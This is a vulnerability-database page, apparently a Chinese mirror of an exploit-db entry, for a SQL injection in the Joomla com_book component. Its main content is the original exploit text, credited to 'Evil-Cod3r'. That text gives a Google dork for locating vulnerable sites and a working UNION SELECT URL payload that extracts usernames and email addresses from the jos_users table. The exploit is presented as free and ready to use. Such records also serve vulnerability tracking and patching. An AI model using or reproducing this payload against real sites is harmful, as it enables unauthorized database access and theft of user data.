Joomla! Component com_book - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059068 漏洞类型
发布时间 2010-01-21 更新时间 2010-01-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11213
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] ~ Note : : <3 v4sploiter
==============================================================================
        [»] Joomla (com_book) SQL injection Vulnerability 
==============================================================================

	[»] Script:             [ Joomla Comp ]
	[»] Language:           [ PHP ]
    [»] Dork:               [ inurl:"com_book" ]
	[»] Founder:            [ Evil-Cod3r ]
    [»] Gr44tz:             [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
    [»] Team:               [ v4-Team.com/cc ]
    [»] Price:              [ Free ]
###########################################################################

http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit

 Exploit : -

index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users-- 


Author: Evil-Cod3r

###########################################################################